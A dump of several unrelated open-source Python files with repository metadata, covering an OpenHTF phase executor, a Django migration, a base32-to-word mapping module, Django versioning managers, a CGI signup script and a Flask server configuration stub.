enumeration to provide user-facing valid phase return values. This tuple
is used internally to track other possible outcomes (timeout, exception),
and to perform some sanity checking (weird return values from phases).
If phase_result is None, that indicates the phase timed out (this makes
sense if you think about it, it timed out, so there was no result). If
phase_result is an instance of Exception, then that is the Exception that
was raised by the phase. The raised_exception attribute can be used as
a convenience to test for that condition, and the is_timeout attribute can
similarly be used to check for the timeout case.
The only accepted values for phase_result are None (timeout), an instance
of Exception (phase raised), or an instance of openhtf.PhaseResult. Any
other value will raise an InvalidPhaseResultError.
"""
def __init__(self, phase_result):
if (phase_result is not None and
not isinstance(phase_result, (Exception, openhtf.PhaseResult))):
raise InvalidPhaseResultError('Invalid phase result', phase_result)
super(PhaseOutcome, self).__init__(phase_result)
@property
def is_timeout(self):
"""True if this PhaseOutcome indicates a phase timeout."""
return self.phase_result is None
@property
def raised_exception(self):
"""True if the phase in question raised an exception."""
return isinstance(self.phase_result, Exception)
class PhaseExecutorThread(threads.KillableThread):
  """Handles the execution and result of a single test phase.

  The phase outcome will be stored in the _phase_outcome attribute once it is
  known (_phase_outcome is None until then), and it will be a PhaseOutcome
  instance.
  """

  def __init__(self, phase, phase_data):
    # phase: the phase callable, carrying .name and .options; phase_data is
    # handed to it when the thread runs.
    self._phase = phase
    self._phase_data = phase_data
    self._phase_outcome = None
    # Note: self.name reads self._phase.name (property below).
    super(PhaseExecutorThread, self).__init__(
        name='PhaseThread: %s' % self.name)

  def _ThreadProc(self):
    """Execute the encompassed phase and save the result."""
    # Call the phase, save the return value, or default it to CONTINUE.
    phase_return = self._phase(self._phase_data)
    if phase_return is None:
      phase_return = openhtf.PhaseResult.CONTINUE
    # Pop any things out of the exit stack and close them.
    self._phase_data.context.pop_all().close()
    # If phase_return is invalid, this will raise, and _phase_outcome will get
    # set to the InvalidPhaseResultError in _ThreadException instead.
    self._phase_outcome = PhaseOutcome(phase_return)

  def _ThreadException(self, exc):
    # Record the raised exception as this phase's outcome and log it.
    self._phase_outcome = PhaseOutcome(exc)
    self._phase_data.logger.exception('Phase %s raised an exception', self.name)

  def JoinOrDie(self):
    """Wait for thread to finish, return a PhaseOutcome with its response."""
    # Use the phase's own timeout when set, otherwise the module default.
    if self._phase.options.timeout_s is not None:
      self.join(self._phase.options.timeout_s)
    else:
      self.join(DEFAULT_PHASE_TIMEOUT_S)

    # We got a return value or an exception and handled it.
    if isinstance(self._phase_outcome, PhaseOutcome):
      return self._phase_outcome

    # Check for timeout, indicated by None for PhaseOutcome.phase_result.
    if self.is_alive():
      self.Kill()
      return PhaseOutcome(None)

    # Phase was killed.
    return PhaseOutcome(threads.ThreadTerminationError())

  @property
  def name(self):
    # Thread display name mirrors the wrapped phase's name.
    return self._phase.name

  def __str__(self):
    return '<%s: (%s)>' % (type(self).__name__, self.name)
  __repr__ = __str__
class PhaseExecutor(object):
  """Encompasses the execution of the phases of a test."""

  def __init__(self, test_state):
    self.test_state = test_state
    self._current_phase_thread = None

  def ExecutePhases(self):
    """Executes each phase or skips them, yielding PhaseOutcome instances.

    Yields:
      PhaseOutcome instance that wraps the phase return value (or exception).
    """
    while self.test_state.pending_phases:
      # _ExecuteOnePhase returns None for a skipped phase (run_if returned
      # falsey); only real outcomes are yielded.
      result = self._ExecuteOnePhase(self.test_state.pending_phases[0])
      if not result:
        continue
      yield result

  def _ExecuteOnePhase(self, phase):
    """Executes the given phase, returning a PhaseOutcome."""
    phase_data = self.test_state.phase_data

    # Check this as early as possible.
    if phase.options.run_if and not phase.options.run_if(phase_data):
      _LOG.info('Phase %s skipped due to run_if returning falsey.', phase.name)
      if self.test_state.pending_phases:
        self.test_state.pending_phases.pop(0)
      return

    _LOG.info('Executing phase %s', phase.name)
    phase_record = test_record.PhaseRecord(phase.name, phase.code_info)
    self.test_state.running_phase_record = phase_record
    with phase_data.RecordPhaseTiming(phase, phase_record):
      # Run the phase in a killable thread so it can be timed out.
      phase_thread = PhaseExecutorThread(phase, phase_data)
      phase_thread.start()
      self._current_phase_thread = phase_thread
      phase_outcome = phase_thread.JoinOrDie()

    # Save the outcome of the phase and do some cleanup.
    phase_record.result = phase_outcome
    self.test_state.record.phases.append(phase_record)
    self.test_state.running_phase_record = None

    # We're done with this phase, pop it from the pending phases.
    # A non-CONTINUE result (e.g. REPEAT) leaves the phase queued so it runs
    # again on the next ExecutePhases loop iteration.
    if (phase_outcome.phase_result is openhtf.PhaseResult.CONTINUE and
        self.test_state.pending_phases):
      self.test_state.pending_phases.pop(0)

    _LOG.debug('Phase finished with outcome %s', phase_outcome)
    return phase_outcome

  def Stop(self):
    """Stops the current phase."""
    if self._current_phase_thread:
      self._current_phase_thread.Kill()
| {
"content_hash": "ef0b62955d1c1f1db4c4db18ad488e89",
"timestamp": "",
"source": "github",
"line_count": 198,
"max_line_length": 80,
"avg_line_length": 36.94949494949495,
"alnum_prop": 0.7206123564789503,
"repo_name": "amyxchen/openhtf",
"id": "6b747f68462bebb2f0a8f1a66bd6e7a8fa3e73da",
"size": "7911",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openhtf/exe/phase_executor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "3564"
},
{
"name": "Protocol Buffer",
"bytes": "12143"
},
{
"name": "Python",
"bytes": "388070"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Rename Contact's name fields: given_name -> first_name and
    family_name -> last_name."""

    dependencies = [
        ('cycontacts', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='contact',
            old_name='given_name',
            new_name='first_name',
        ),
        migrations.RenameField(
            model_name='contact',
            old_name='family_name',
            new_name='last_name',
        ),
    ]
| {
"content_hash": "69cc3f634be76ede0ddb72bb6a44ec81",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 40,
"avg_line_length": 22.217391304347824,
"alnum_prop": 0.5459882583170255,
"repo_name": "shawnhermans/cyborgcrm",
"id": "f29ea9afcff3cd57c7579350b213b3ecdc3c31d7",
"size": "535",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cyidentity/cycontacts/migrations/0002_auto_20150617_1245.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "26682"
},
{
"name": "DIGITAL Command Language",
"bytes": "667"
},
{
"name": "HTML",
"bytes": "405415"
},
{
"name": "JavaScript",
"bytes": "735"
},
{
"name": "Python",
"bytes": "100893"
},
{
"name": "Shell",
"bytes": "725"
}
],
"symlink_target": ""
} |
from string import ascii_lowercase
from itertools import product
from scipy.spatial.distance import pdist, squareform
import editdistance
import numpy as np
import pdb
import sys
import re
import gzip
NMER_SIZE = 3  # length of the character n-mers used throughout this module
# --- loading and prep --- #
def get_base32(nmer_size=None):
    """
    Generate all nmers (fixed-length strings) over the base32 alphabet
    (lowercase a-z plus the digits 2-7).

    Args:
        nmer_size: length of each nmer; defaults to the module-level
            NMER_SIZE when not given, so existing zero-argument callers
            are unaffected.

    Returns:
        list of strings: every combination of base32 characters of the
        requested length (32**nmer_size entries, in product order).
    """
    if nmer_size is None:
        nmer_size = NMER_SIZE
    base32_chars = ascii_lowercase + '234567'
    return [''.join(chars) for chars in product(base32_chars, repeat=nmer_size)]
def subset_language(vocabulary, vectors, wordlist, N=32768):
    """
    Subset the vocabulary/vectors to those in a wordlist.
    The wordlist is a list arranged in order of 'preference'.
    Note: we hope the vocabulary is contained in the wordlist,
    but it might not be. N is the number of words we require.
    If the wordlist contains fewer than N words, (but the vocabulary has >= N),
    we supplement the result from the vocabulary randomly.
    Also, we want to make sure the order of vocabulary is random (because some
    structure could negatively influence the optimisation procedure later).
    Arguments:
    vocabulary list of words (strings)
    vectors list of vectors corresponding to vocabulary
    wordlist str, list, or array, if str: path for .npy of words
    N int: number of words we want vectors for
    Returns:
    vocabulary_subset list of words (len N)
    vectors_subset ndarray of vectors corresponding to words (shape[0] = N)
    """
    keep_indices = [] # indices of vocabulary/vectors to keep
    added = 0
    if type(wordlist) == str:
        # load from path
        print 'Loading wordlist from', wordlist
        wordlist = np.loadtxt(wordlist, dtype=str)
    else:
        assert type(wordlist) == list or type(wordlist) == np.ndarray
    print 'Subsetting vocabulary.'
    # Walk the wordlist in preference order, keeping words found in the
    # vocabulary until N have been collected.
    for word in wordlist:
        # NOTE(review): printing every candidate word is very noisy for
        # large wordlists -- likely leftover debug output; confirm.
        print word
        if added == N:
            break
        try:
            word_index = vocabulary.index(word)
            keep_indices.append(word_index)
            added += 1
        except ValueError:
            # word not present in the vocabulary; just move on
            continue
    print 'Acquired', len(keep_indices), 'words.'
    miss = N - len(keep_indices)
    if miss > 0:
        print 'Supplementing with', miss, 'random words.'
        # Draw random, not-yet-kept vocabulary indices to fill the gap.
        # NOTE(review): np.random.choice(len(vocabulary), 1) returns a
        # length-1 ndarray, not an int, so keep_indices ends up mixing ints
        # and arrays; vocabulary[i] with an array index would raise
        # TypeError below -- confirm this path has been exercised.
        for i in xrange(miss):
            random_index = np.random.choice(len(vocabulary), 1)
            while random_index in keep_indices:
                random_index = np.random.choice(len(vocabulary), 1)
            keep_indices.append(random_index)
    print 'Shuffling.'
    # shuffle
    np.random.shuffle(keep_indices)
    # populate new arrays
    print 'Populating subsetted arrays.'
    vectors_subset = vectors[keep_indices]
    vocabulary_subset = [vocabulary[i] for i in keep_indices]
    return vocabulary_subset, vectors_subset
def get_language(path):
    """
    Get the LANGUAGE words, and vectors!
    Takes a path to a file like
    apple 0.3410 0.24 0.4114
    orange 0.613 3.414 0.512
    Outputs a list like [apple, orange]
    and a np array like [[0.3410, 0.24, 0.4114],
    [0.613, 3.414, 0.512]]
    """
    print 'Loading language from', path
    vocabulary = []
    vectors = []
    # Transparently support gzipped input files.
    # NOTE(review): the file handle is never closed -- consider a
    # with-block or explicit close.
    if '.gz' in path:
        fi = gzip.open(path, 'rb')
    else:
        fi = open(path, 'r')
    for line in fi:
        # Columns may be tab- or space-separated.
        if '\t' in line:
            sl = line.strip('\n').split('\t')
        else:
            sl = line.strip('\n').split(' ')
        # Strip stray NUL bytes from the token.
        word = re.sub('\x00', '', sl[0])
        vocabulary.append(word)
        if len(sl) > 1:
            vector = map(float, sl[1:])
        else:
            # No vector on this line: substitute a random 5-dim vector.
            # NOTE(review): silently fabricating vectors can mask malformed
            # input files -- confirm this is intended.
            vector = np.random.normal(size=5)
        vectors.append(vector)
    vectors = np.array(vectors)
    W = len(vocabulary)
    print 'Loaded', W, 'words from', path
    return vocabulary, vectors
# --- distance metrics --- #
def distance_lookup_table():
    """
    Pairwise character similarity lookup table for the base32 characters
    (lowercase a-z plus the digits 2-7).

    Visually-confusable character pairs get distance 0.5, identical
    characters 0.0, and all other pairs 1.0.
    Similarities:
    - i ~ l (1 is not a problem as it does not exist in base32)
    - b ~ d
    - p ~ q
    - m ~ n
    - v ~ w
    - c ~ e
    - a ~ o
    Note: this is largely arbitrary from me, partially influenced by:
    http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3541865/table/t1-ptj3712663/

    Returns:
        (distance_lookup, distance_lookup_dict): an n_chars x n_chars
        ndarray indexed by character position in the base32 alphabet, and
        the same distances keyed by (char_a, char_b) tuples.
    """
    base32_chars = ascii_lowercase + '234567'
    n_chars = len(base32_chars)
    # start off all ones
    distance_lookup = np.ones(shape=(n_chars, n_chars))
    # Visually-similar pairs share a reduced (0.5) distance, symmetrically.
    # (0.5 may not be the best value for this.)
    similar_pairs = [('b', 'd'), ('p', 'q'), ('m', 'n'),
                     ('v', 'w'), ('c', 'e'), ('a', 'o')]
    for char_a, char_b in similar_pairs:
        i = base32_chars.index(char_a)
        j = base32_chars.index(char_b)
        distance_lookup[i, j] = 0.5
        distance_lookup[j, i] = 0.5
    # zeros along the diagonal: identical characters are distance 0
    for i in range(n_chars):
        distance_lookup[i, i] = 0
    # Mirror the array into a dict keyed by character pairs for convenience.
    distance_lookup_dict = dict()
    for (i, a) in enumerate(base32_chars):
        for (j, b) in enumerate(base32_chars):
            distance_lookup_dict[(a, b)] = distance_lookup[i, j]
    return distance_lookup, distance_lookup_dict
def bespoke_distance(nmer1, nmer2, offset_kappa=0.5):
    """
    Hand-crafted distance function, probably not a real metric.

    Thinking about what is 'hard to differentiate', as a human looking at
    strings.  Properties:
        - adjacent swaps are hard to detect
        - m ~ rn
        - see pairwise_character_distance

    Parameters
    ----------
    nmer1, nmer2 : str
        The two nmers to compare.  Assumed equal length -- TODO confirm.
    offset_kappa : float, optional
        Weight for the offset (rotated-by-one) comparisons.  BUGFIX: given a
        default so callers that pass only two arguments (e.g.
        base32_distances) reach the intended NotImplementedError instead of
        failing with TypeError.

    Raises
    ------
    NotImplementedError
        Always -- the code below is an unfinished, unreachable draft.
    """
    raise NotImplementedError
    # ----- unreachable draft implementation below -----
    d = 0
    # if the nmers are identical, don't need to do anything complicated
    if nmer1 == nmer2:
        return d
    # check exact correspondences (increment distances)
    for (a, b) in zip(nmer1, nmer2):
        d += pairwise_character_distance(a, b)  # this fn has bespoke distances
    # now check with an offset (rotate nmer1 left by one)
    # BUGFIX: the original referenced an undefined name 'nmer' here.
    for (a, b) in zip(nmer1[1:] + nmer1[0], nmer2):
        d += offset_kappa * pairwise_character_distance(a, b)
    # negative offset (rotate nmer1 right by one)
    for (a, b) in zip(nmer1[-1] + nmer1[:-1], nmer2):
        d += offset_kappa * pairwise_character_distance(a, b)
    # I can already feel how slow this is going to be.
    # placeholder: this overwrites the accumulated distance with noise
    d = abs(np.random.normal())
    return d
def base32_distances(base32_nmers, metric='levenshtein'):
    """
    Get pairwise distances (different metrics)
    This takes a little while

    Parameters
    ----------
    base32_nmers : sequence of str
        The nmers to compare pairwise.
    metric : str
        'levenshtein' (uses the editdistance package) or 'bespoke'
        (calls bespoke_distance, which raises NotImplementedError and is
        invoked here without its offset_kappa argument -- TODO confirm).

    Returns
    -------
    d : (N, N) numpy array
        Symmetric matrix of pairwise distances.
    """
    N = len(base32_nmers)
    # float total so the progress percentage below is a float division
    total = N*(N-1.0)/2
    print 'Calculating', N*(N-1)/2, 'pairwise distances.'
    # NOTE(review): np.float is deprecated and removed in numpy >= 1.24;
    # plain `float` would be the safe spelling.
    d = np.empty(shape=(N, N), dtype=np.float)
    n = 0
    for i in xrange(N):
        # j starts at i so each unordered pair is computed exactly once
        for j in xrange(i, N):
            n += 1
            # progress indicator, refreshed every 500k pairs
            if n%500000 == 0:
                sys.stdout.write('\r'+'%.4f' % (float(n*100)/total)+'%')
                sys.stdout.flush()
            if metric == 'levenshtein':
                dij = editdistance.eval(base32_nmers[i], base32_nmers[j])
            elif metric == 'bespoke':
                dij = bespoke_distance(base32_nmers[i], base32_nmers[j])
            else:
                raise NotImplementedError
            # fill both triangles to keep the matrix symmetric
            d[i, j] = dij
            d[j, i] = dij
    print ''
    return d
def visual_string_distance(a, b):
    """
    Distance between two strings (a, b) using _visual_ features.
    Design sketch only -- not implemented yet; always raises.

    Ideas:
        Same length, n:
            compare a sliding window for swaps, remembering which letters
            are involved in swaps, normalise by string length;
            compare letter by letter with the base32 similarity table,
            normalise by length (one position differing with value 1 gives
            total dissimilarity 1/n), except position 0, which is special
            and weighted more; exclude positions involved in swaps.
        Lengths differing by d:
            if d > 3: return 1 (maximally dissimilar)
            else: slide the shorter word along the longer and apply the
            same-length comparison, taking care with position 0 while
            sliding, and penalise d depending on n (shorter word length).
    Other considerations:
        phonetic similarity (thanks zach)
        cut my life into pizza
        this is my plastic fork
    """
    raise NotImplementedError
    return 0.5  # unreachable placeholder
# --- maps --- #
def random_map(nmers, vocabulary):
    """
    Totally random map, totally unconstrained, totally boring.

    Pairs each nmer with the vocabulary word at the same position and
    returns the mapping in both directions.
    """
    forward_mapping = {}
    backward_mapping = {}
    for (nmer, word) in zip(nmers, vocabulary):
        forward_mapping[nmer] = word
        backward_mapping[word] = nmer
    return forward_mapping, backward_mapping
def diverse_map(nmers, vocabulary, vectors):
    """
    Map which aims to map pairs of similar base32 nmers to pairs of dissimilar
    language words.

    Parameters
    ----------
    nmers : list of str
    vocabulary : list of words (same length as nmers; see get_map)
    vectors : array of word vectors aligned with vocabulary

    Returns
    -------
    (forward_mapping, backward_mapping) : dict, dict
    """
    N = len(nmers)
    # pairwise distances between the nmers (levenshtein by default)
    A = base32_distances(nmers)
    print A.shape
    # pairwise cosine distances between the word vectors
    B = squareform(pdist(vectors, 'cosine'))
    print B.shape
    # find_ordering is defined elsewhere -- presumably it matches rows of A
    # to rows of B so similar nmers receive dissimilar words; TODO confirm.
    ordering = find_ordering(A, B)
    forward_mapping, backward_mapping = dict(), dict()
    for i in xrange(N):
        triple = nmers[i]
        word = vocabulary[ordering[i]]
        forward_mapping[triple] = word
        backward_mapping[word] = triple
    return forward_mapping, backward_mapping
def get_map(nmers, vocabulary, vectors=None, mapping='random'):
    """
    Prep and get a map.

    Subsets the vocabulary down to len(nmers) if needed, then builds the
    forward/backward mappings using the requested strategy.

    Parameters
    ----------
    nmers : list of str
    vocabulary : list of words, at least as long as nmers
    vectors : word vectors, required when mapping == 'diverse'
    mapping : 'random' or 'diverse'

    Returns
    -------
    (forward_mapping, backward_mapping), or False on error.
    """
    N = len(nmers)
    W = len(vocabulary)
    if W < N:
        print 'ERROR: Not enough words.'
        return False
    if W > N:
        # trailing comma = Python 2 print without a newline
        print 'There are', W, 'elements in the vocabulary and only', N,
        print 'nmers: subsetting.'
        # NOTE(review): np.random.choice defaults to replace=True, so the
        # subset can contain duplicate words (which would then collide in
        # backward_mapping) -- probably wants replace=False; confirm.
        vocabulary_subset = list(np.random.choice(vocabulary, N))
        vocabulary = vocabulary_subset
    if mapping == 'random':
        print 'Using random map.'
        forward_mapping, backward_mapping = random_map(nmers, vocabulary)
    elif mapping == 'diverse':
        print 'Using diverse map.'
        if vectors is None:
            print 'ERROR: diverse map requires vectors.'
            return False
        forward_mapping, backward_mapping = diverse_map(nmers, vocabulary, vectors)
    else:
        # NOTE(review): this branch neither returns nor defines the mappings,
        # so unknown `mapping` values raise NameError in the loop below.
        print 'ERROR: Not implemented :('
    # sanity check: the two mappings should be mutual inverses;
    # mismatches are printed but not treated as errors
    for (k, v) in forward_mapping.iteritems():
        if not backward_mapping[v] == k:
            print k, v
    return forward_mapping, backward_mapping
| {
"content_hash": "c6d02d37f5e270ecd9b28f480de5c66a",
"timestamp": "",
"source": "github",
"line_count": 320,
"max_line_length": 96,
"avg_line_length": 34.703125,
"alnum_prop": 0.6105357946870779,
"repo_name": "corcra/leekspeak",
"id": "69bab2012a676254824d73cf747377ef7a2d835c",
"size": "11176",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "map_fns.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13873"
},
{
"name": "R",
"bytes": "821"
}
],
"symlink_target": ""
} |
"""
CORE APP
This module provides an interface to the app's managers.
"""
from django.db import models
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
# from polymorphic import PolymorphicManager
from tunobase.core import constants, query
# Normal managers
class VersionManager(models.Manager):
    """Manager that bulk-publishes pending Version objects."""
    def publish_objects(self):
        """Publish pending versions whose publish time has passed.

        For every version not already published, if its series contains no
        published version and its content object's ``publish_at`` is in the
        past, the content object is saved as published and the matching
        Version rows are updated in a single query.  (Note: despite the
        original docstring, this method mutates state and returns nothing --
        it does not "return only published objects".)
        """
        # candidates: every version that is not already published
        queryset = self.exclude(state=constants.STATE_PUBLISHED)
        to_publish_ids = []
        for obj in queryset:
            # True if any version in this object's series is already published
            published_obj = obj.series.versions.filter(
                state=constants.STATE_PUBLISHED
            ).exists()
            if not published_obj and obj.content_object.publish_at <= timezone.now():
                to_publish_ids.append(obj.pk)
                # publish the underlying content object first...
                obj.content_object.state = constants.STATE_PUBLISHED
                obj.content_object.save()
        # ...then flip the collected Version rows in one bulk UPDATE
        update_queryset = self.filter(pk__in=to_publish_ids)
        update_queryset.update(state=constants.STATE_PUBLISHED)
class CoreManager(models.Manager):
    """Manager exposing the core queryset helpers."""
    def get_queryset(self):
        """Build the base CoreQuerySet for this manager's model."""
        queryset = query.CoreQuerySet(self.model, using=self._db)
        return queryset
    def for_current_site(self):
        """Restrict the base queryset to the current site."""
        base = self.get_queryset()
        return base.for_current_site()
class CoreStateManager(CoreManager):
    """Return relevant objects depending on state.

    Extends CoreManager with publishing, staging and versioning helpers.
    Version-related models are imported lazily inside methods to avoid a
    circular import with tunobase.core.models.
    """
    def get_queryset(self):
        """Return the state-aware queryset for this manager's model."""
        return query.CoreStateQuerySet(self.model, using=self._db)
    def publish_objects(self):
        """Publish permitted objects whose publish time has passed."""
        queryset = self.permitted().filter(
            publish_at__lte=timezone.now()
        ).exclude(state=constants.STATE_PUBLISHED)
        queryset.update(state=constants.STATE_PUBLISHED)
    def permitted(self):
        """Only return published objects."""
        return self.get_queryset().permitted()
    def get_list(self):
        """Return the list representation from the queryset."""
        return self.get_queryset().get_list()
    def get_console_queryset(self):
        """Return the queryset used by the admin console."""
        return self.get_queryset().get_console_queryset()
    def version_list(self, object_id, state):
        """Return versions in object_id's series with the given state.

        Each version is annotated with ``change_url``, the admin change URL
        of its content object.  Returns [] when the object has no series.
        """
        series = self.get_series(object_id)
        if series is not None:
            qs = series.versions.filter(state=state)
            for model in qs:
                model.change_url = reverse('%s_%s_change' % (
                    model.content_object._meta.app_label,
                    model.content_object._meta.module_name),
                    args=(model.object_id,)
                )
            return qs
        return []
    def get_series(self, object_id):
        """Return the VersionSeries for object_id, or None when not found.

        The bare ``except:`` has been narrowed to ``Exception`` so that
        KeyboardInterrupt/SystemExit are no longer swallowed.
        """
        from tunobase.core.models import Version
        model_type = ContentType.objects.get_for_model(self.model)
        try:
            return Version.objects.get(
                content_type__pk=model_type.id,
                object_id=object_id
            ).series
        except Exception:
            # Typically Version.DoesNotExist when no version row exists.
            return None
    def add_series(self, slug):
        """Create and return a new VersionSeries with the given slug."""
        from tunobase.core.models import VersionSeries
        return VersionSeries.objects.create(
            slug=slug
        )
    def add_version(self, obj):
        """Create a new series for obj and record obj as its version 1."""
        from tunobase.core.models import Version
        model_type = ContentType.objects.get_for_model(self.model)
        series = self.add_series(slugify(str(obj)))
        Version.objects.create(
            content_type=model_type,
            object_id=obj.pk,
            series=series,
            number=1,
            state=obj.state
        )
    def add_to_series(self, series, obj):
        """Append obj to an existing series as the next version number."""
        from tunobase.core.models import Version
        model_type = ContentType.objects.get_for_model(self.model)
        try:
            latest_version_number = Version.objects.filter(
                series=series
            ).order_by('-number')[0].number + 1
        except Exception:
            # IndexError when the series has no versions yet
            # (bare except narrowed to Exception).
            latest_version_number = 1
        Version.objects.create(
            content_type=model_type,
            object_id=obj.pk,
            series=series,
            number=latest_version_number,
            state=constants.STATE_UNPUBLISHED
        )
    def stage_version(self, object_id):
        """Stage the version for object_id, un-staging any other staged
        version in the same series first."""
        from tunobase.core.models import Version
        series = self.get_series(object_id)
        model_type = ContentType.objects.get_for_model(self.model)
        if series is not None and Version.objects.filter(
                series=series, state=constants.STATE_STAGED).exists():
            # demote the currently staged version (and its content object)
            staged_version = Version.objects.get(
                series=series,
                state=constants.STATE_STAGED
            )
            staged_version.state = constants.STATE_UNPUBLISHED
            staged_version.save()
            staged_version.content_object.state = constants.STATE_UNPUBLISHED
            staged_version.content_object.save()
        version = Version.objects.get(
            content_type__pk=model_type.id,
            object_id=object_id
        )
        version.state = constants.STATE_STAGED
        version.save()
        version.content_object.state = constants.STATE_STAGED
        version.content_object.save()
    def publish_version(self, object_id):
        """Publish the version for object_id, unpublishing any other
        published version in the same series first."""
        from tunobase.core.models import Version
        series = self.get_series(object_id)
        model_type = ContentType.objects.get_for_model(self.model)
        if series is not None and Version.objects.filter(
                series=series, state=constants.STATE_PUBLISHED).exists():
            # demote the currently published version (and its content object)
            published_version = Version.objects.get(
                series=series,
                state=constants.STATE_PUBLISHED
            )
            published_version.state = constants.STATE_UNPUBLISHED
            published_version.save()
            published_version.content_object.state = constants.STATE_UNPUBLISHED
            published_version.content_object.save()
        version = Version.objects.get(
            content_type__pk=model_type.id,
            object_id=object_id
        )
        version.state = constants.STATE_PUBLISHED
        version.save()
        version.content_object.state = constants.STATE_PUBLISHED
        version.content_object.save()
    def unpublish_version(self, object_id):
        """Unpublish the version for object_id and its content object."""
        from tunobase.core.models import Version
        model_type = ContentType.objects.get_for_model(self.model)
        version = Version.objects.get(
            content_type__pk=model_type.id,
            object_id=object_id
        )
        version.state = constants.STATE_UNPUBLISHED
        version.save()
        version.content_object.state = constants.STATE_UNPUBLISHED
        # NOTE(review): setting publish_date_time on *unpublish* looks odd --
        # confirm this is intentional.
        version.content_object.publish_date_time = timezone.now()
        version.content_object.save()
    def delete_version(self, object_id):
        """Soft-delete the version for object_id and its content object."""
        from tunobase.core.models import Version
        model_type = ContentType.objects.get_for_model(self.model)
        version = Version.objects.get(
            content_type__pk=model_type.id,
            object_id=object_id
        )
        version.state = constants.STATE_DELETED
        version.save()
        version.content_object.state = constants.STATE_DELETED
        version.content_object.save()
# # Polymorphic Managers
#
# class CorePolymorphicManager(PolymorphicManager, CoreManager):
#
# def get_queryset(self):
# return query.CorePolymorphicQuerySet(self.model, using=self._db)
#
#
# class CorePolymorphicStateManager(CorePolymorphicManager, CoreStateManager):
#
# def get_queryset(self):
# return query.CorePolymorphicStateQuerySet(self.model, using=self._db)
# Other Managers
class DefaultImageManager(CoreStateManager):
    """Manager for default images, with random-selection support."""
    def get_queryset(self):
        """Return the default-image queryset."""
        qs = query.DefaultImageQuerySet(self.model, using=self._db)
        return qs
    def get_random(self, category=None):
        """Return a random object, optionally limited to *category*."""
        return self.get_queryset().get_random(category)
| {
"content_hash": "001bcaf8b5b0bc01e0ba455babc0d102",
"timestamp": "",
"source": "github",
"line_count": 237,
"max_line_length": 85,
"avg_line_length": 33.28270042194093,
"alnum_prop": 0.6261409736308317,
"repo_name": "unomena/tunobase-core",
"id": "e02933019e3e41d17a5ef3ba6de4808bcc92db4c",
"size": "7888",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tunobase/core/managers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9114"
},
{
"name": "Python",
"bytes": "310065"
}
],
"symlink_target": ""
} |
# CGI response header: this script runs as a CGI endpoint, so the
# Content-type header (plus blank line) must be emitted before any output.
print "Content-type:text/html\n\n"
import MySQLdb
import hashlib
import cgi
import sys
import json
import uuid
def hash_password(password):
    """Hash *password* with a fresh random salt.

    Returns a string of the form ``<sha256-hexdigest>:<salt>`` where the
    digest is sha256 over salt followed by the password.
    """
    salt = uuid.uuid4().hex
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return '%s:%s' % (digest, salt)
# grab data from POSTed JSON on stdin (CGI request body)
data = sys.stdin.read()
myjson = json.loads(data)
input_username = myjson['username']
input_password = myjson['password']
try:
    conn = MySQLdb.connect (
        host = "my_host",
        user = "my_user",
        passwd = "my_password",
        db = "my_db")
    #create a cursor for the select
    cur = conn.cursor()
    #execute a sql query; parameterised, so safe from SQL injection
    command = "INSERT INTO User(username, password) VALUES(%s,%s)"
    cur.execute(command, (input_username, hash_password(input_password)))
    # NOTE(review): no conn.commit() -- with MySQLdb's default
    # autocommit=off the INSERT is rolled back when the connection closes.
    # NOTE(review): this echoes the *plaintext* password back to the client.
    print json.dumps({'username':input_username, 'password':input_password})
except MySQLdb.Error, e:
    print json.dumps({'error':"Error %d: %s" % (e.args[0], e.args[1])})
    sys.exit (1)
finally:
    # NOTE(review): if connect() itself raised, `cur` and `conn` were never
    # bound, so these references raise NameError inside the finally block.
    if cur:
        # close the cursor
        cur.close()
    if conn:
        # close the connection
        conn.close()
| {
"content_hash": "d1e3b43bb64e24c675c312b517ad8af5",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 85,
"avg_line_length": 23.15909090909091,
"alnum_prop": 0.6879293424926398,
"repo_name": "Rovel/ultra-motivator",
"id": "aa43b95ab44e2767f0a364a6e1f259668d8a9e4c",
"size": "1037",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "api/signup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "77"
},
{
"name": "Python",
"bytes": "11900"
},
{
"name": "Swift",
"bytes": "16866"
}
],
"symlink_target": ""
} |
from flask import Flask
from flask import request
from flask import Response
from functools import wraps
from OpenSSL import SSL
from fgapiserverconfig import FGApiServerConfig
import os
import sys
import json
import logging.config
"""
FutureGateway APIServer front-end
"""
# NOTE(review): the string above follows the imports, so it is evaluated
# and discarded rather than becoming the module docstring.
__author__ = "Riccardo Bruno"
__copyright__ = "2015"
__license__ = "Apache"
__version__ = "v0.0.2-30-g37540b8-37540b8-37"
__maintainer__ = "Riccardo Bruno"
__email__ = "riccardo.bruno@ct.infn.it"
# setup path so sibling modules resolve regardless of the working directory
fgapirundir = os.path.dirname(os.path.abspath(__file__)) + '/'
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
# fgapiserver configuration file (lives next to this script)
fgapiserver_config_file = fgapirundir + 'fgapiserver.conf'
# Load configuration
fg_config = FGApiServerConfig(fgapiserver_config_file)
# fgapiserver settings (string flags are compared case-insensitively
# against 'true' to produce booleans)
fgapiver = fg_config.get_config_value('fgapiver')
fgapiserver_name = fg_config.get_config_value('fgapiserver_name')
fgapisrv_host = fg_config.get_config_value('fgapisrv_host')
fgapisrv_port = int(fg_config.get_config_value('fgapisrv_port'))
fgapisrv_debug = (fg_config.get_config_value(
    'fgapisrv_debug').lower() == 'true')
fgapisrv_iosandbox = fg_config.get_config_value('fgapisrv_iosandbox')
